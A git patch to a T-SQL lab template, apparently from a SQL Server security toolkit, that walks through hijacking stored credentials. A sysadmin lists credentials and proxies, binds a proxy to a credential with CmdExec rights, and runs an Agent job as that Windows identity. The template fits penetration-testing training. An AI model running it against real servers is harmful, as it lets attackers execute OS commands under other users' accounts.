From d5250ebd5e5f8361692be97795866b5e851af061 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 12:39:55 -0500 Subject: [PATCH] Update Get-Credentials-Hijack.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 78 ++++++++++++++++------ 1 file changed, 58 insertions(+), 20 deletions(-) diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql index d68cbea..2b1bb9d 100644 --- a/templates/tsql/Get-Credentials-Hijack.tsql +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -1,20 +1,59 @@ -- Tested and worked - SQL Server v2014 instance - --------------------------- --- Create a new credential named 'MyCredential' - for testing --------------------------- +-- Author: Scott Sutherland @_nullbind (Twitter) + +-- ################################# +-- LAB SETUP SUMMARY +--- ################################# +-- 1. Install local instance +-- 2. Create local OS user named 'testuser'. +-- 3. Log into SQL Server instance as a sysadmin and create credential. + +-- ################################# +-- LAB SETUP SUMMARY +-- ################################# +-- 1. Log into the SQL Server instance as a sysadmin. +-- 2. List credentials. +-- 3. List proxy accounts. +-- 3. Create proxy account and assign privileges to it (if proxy account doesnt exist for credential already). List proxy accounts to confirm addition. +-- 4. Create Agent job that uses the proxy account. +-- 5. Execute a PowerShell, VBscript, JScript, or CMDEXEC Agent Job. These will create processes on the system in that user context. +-- 6. Confirm execution by reviewing history. + +--- ################################# +-- Walk Through Below +--- ################################# + +---------------------------------------------------- +-- Create a new credential named 'MyCredential' for testing (for lab only) +---------------------------------------------------- CREATE CREDENTIAL [MyCredential] -WITH IDENTITY = 'machinename\osusername', +WITH IDENTITY = 'yourcomputernamehere\testuser', SECRET = 'P@ssw0rd!'; --------------------------- --- Get list of all credentials --------------------------- +---------------------------------------------------- +-- Get a list of all credentials +---------------------------------------------------- select * from sys.credentials --------------------------- --- Create a Proxy Using the Target Credential --------------------------- +---------------------------------------------------- +-- Get a list proxies +---------------------------------------------------- +USE msdb; +GO + +SELECT + proxy_id, + name AS proxy_name, + credential_id, + enabled +FROM + dbo.sysproxies; +GO + +---------------------------------------------------- +-- Create a Proxy Using the Target Credential (if needed) +---------------------------------------------------- + USE msdb; GO @@ -26,10 +65,9 @@ EXEC sp_grant_proxy_to_subsystem @proxy_name = N'MyCredentialProxy', @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem --------------------------- --- List Proxies --------------------------- - +---------------------------------------------------- +-- Get a list proxies - again +---------------------------------------------------- USE msdb; GO @@ -42,9 +80,9 @@ FROM dbo.sysproxies; GO --------------------------- +---------------------------------------------------- -- Create the SQL Server Agent Job Configured to use the Proxy Account --------------------------- +---------------------------------------------------- USE msdb; GO @@ -76,10 +114,11 @@ EXEC sp_add_jobserver @job_name = N'WhoAmIJob', @server_name = N'(LOCAL)'; -- The server where the job will run --------------------------- +---------------------------------------------------- -- Get List of Proxy Account used by Agent Jobs -- Show job, step, proxy, cred, and identity --------------------------- +---------------------------------------------------- + USE msdb; GO @@ -103,7 +142,6 @@ WHERE ORDER BY jobs.name, steps.step_id; - -------------------------- -- Execute the Job --------------------------